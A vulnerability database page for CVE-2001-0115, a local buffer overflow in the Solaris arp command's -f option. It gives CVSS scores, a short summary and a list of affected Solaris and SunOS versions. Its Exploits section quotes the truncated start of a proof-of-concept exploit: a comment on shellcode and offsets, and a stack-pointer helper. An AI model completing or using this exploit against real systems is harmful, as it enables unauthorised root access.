7.2
CVSSv2

CVE-2001-0115

Published: 12/03/2001 Updated: 30/10/2018
CVSS v2 Base Score: 7.2 | Impact Score: 10 | Exploitability Score: 3.9
VMScore: 725
Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

Buffer overflow in arp command in Solaris 7 and previous versions allows local users to execute arbitrary commands via a long -f parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

sun solaris 2.5

sun solaris 2.6

sun sunos 5.4

sun sunos -

sun sunos 5.7

sun solaris 2.4

sun sunos 5.5

sun solaris 7.0

sun sunos 5.5.1

sun solaris 2.5.1

Exploits

/* arp overflow proof of concept by ahmed@securityfocuscom shellcode originally written by Cheez Whiz tested on x86 solaris 7,8beta default should work if not, arg1 = offset +- by 100's Copyright Security-Focuscom, 11/2000 */ long get_esp() { __asm__("movl %esp,%eax"); } int main(int ac, char **av ...